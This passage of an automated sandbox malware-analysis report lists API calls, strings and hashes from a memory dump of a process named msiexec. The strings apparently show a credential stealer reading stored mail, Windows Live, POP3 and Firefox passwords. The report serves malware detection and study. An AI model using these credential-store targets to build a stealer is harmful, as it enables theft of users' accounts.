                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                    • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                    • String ID:
                                                                    • API String ID: 78143705-3916222277
                                                                    • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                    • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                    • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                    • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                    APIs
                                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                    • memset.MSVCRT ref: 0040FA1E
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                    • _strnicmp.MSVCRT ref: 0040FA4F
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                    • String ID: WindowsLive:name=*$windowslive:name=
                                                                    • API String ID: 945165440-3589380929
                                                                    • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                    • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                    • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                    • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040F84A
                                                                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                    • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                    • String ID: Creds$ps:password
                                                                    • API String ID: 2290531041-1872227768
                                                                    • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                    • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                    • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                    • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                    APIs
                                                                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                      • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                      • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                    • strchr.MSVCRT ref: 0040371F
                                                                    • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                    • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                    • strlen.MSVCRT ref: 00403778
                                                                    • sprintf.MSVCRT ref: 0040379C
                                                                    • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                    • String ID: %s@gmail.com
                                                                    • API String ID: 3261640601-4097000612
                                                                    • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                    • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                    • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                    • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004094C8
                                                                    • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                    • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                    • memset.MSVCRT ref: 0040950C
                                                                    • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                    • _strcmpi.MSVCRT ref: 00409531
                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                    • String ID: sysdatetimepick32
                                                                    • API String ID: 3411445237-4169760276
                                                                    • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                    • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                    • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                    • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403504
                                                                    • memset.MSVCRT ref: 0040351A
                                                                    • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                    • _mbscat.MSVCRT ref: 0040356D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscatmemset$_mbscpystrlen
                                                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                    • API String ID: 632640181-966475738
                                                                    • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                    • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                    • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                    • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                      • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                      • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                      • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                    • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Item$DialogMessageSend
                                                                    • String ID:
                                                                    • API String ID: 2485852401-0
                                                                    • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                    • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                    • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                    • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                    APIs
                                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                    • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                    • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                    • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                    • String ID:
                                                                    • API String ID: 3642520215-0
                                                                    • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                    • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                    • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                    • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                    APIs
                                                                    • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                    • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                    • GetDC.USER32(00000000), ref: 004072FB
                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                    • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                    • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                    • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                    • String ID:
                                                                    • API String ID: 1999381814-0
                                                                    • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                    • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                    • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                    • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                    • API String ID: 1297977491-3883738016
                                                                    • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                    • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                    • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                    • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                    APIs
                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID: gj
                                                                    • API String ID: 438689982-4203073231
                                                                    • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                    • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                    • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                    • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm$__aullrem
                                                                    • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                    • API String ID: 643879872-978417875
                                                                    • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                    • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                    • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                    • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040DAE3
                                                                    • memset.MSVCRT ref: 0040DAF7
                                                                    • memset.MSVCRT ref: 0040DB0B
                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset$strlen$_memicmp
                                                                    • String ID: user_pref("
                                                                    • API String ID: 765841271-2487180061
                                                                    • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                    • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                    • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                    • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                    • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                    • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                    • memset.MSVCRT ref: 004058C3
                                                                    • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                    • SetFocus.USER32(?), ref: 00405976
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$FocusItemmemset
                                                                    • String ID:
                                                                    • API String ID: 4281309102-0
                                                                    • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                    • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                    • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                    • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                    APIs
                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                    • _mbscat.MSVCRT ref: 0040A8FF
                                                                    • sprintf.MSVCRT ref: 0040A921
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite_mbscatsprintfstrlen
                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                    • API String ID: 1631269929-4153097237
                                                                    • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                    • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                    • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                    • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040810E
                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,67CE7B60,?), ref: 004081B9
                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                    • String ID: POP3_credentials$POP3_host$POP3_name
                                                                    • API String ID: 524865279-2190619648
                                                                    • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                    • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                    • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                    • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$CountInfomemsetstrchr
                                                                    • String ID: 0$6
                                                                    • API String ID: 2300387033-3849865405
                                                                    • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                    • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                    • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                    • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004076D7
                                                                    • sprintf.MSVCRT ref: 00407704
                                                                    • strlen.MSVCRT ref: 00407710
                                                                    • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                    • strlen.MSVCRT ref: 00407733
                                                                    • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpystrlen$memsetsprintf
                                                                    • String ID: %s (%s)
                                                                    • API String ID: 3756086014-1363028141
                                                                    • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                    • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                    • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                    • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                    APIs
                                                                    • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                    • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                    • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                    Strings
                                                                    • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                    • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                    • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                    • API String ID: 1640410171-3316789007
                                                                    • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                    • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                    • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                    • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscat$memsetsprintf
                                                                    • String ID: %2.2X
                                                                    • API String ID: 125969286-791839006
                                                                    • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                    • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                    • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                    • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                    APIs
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
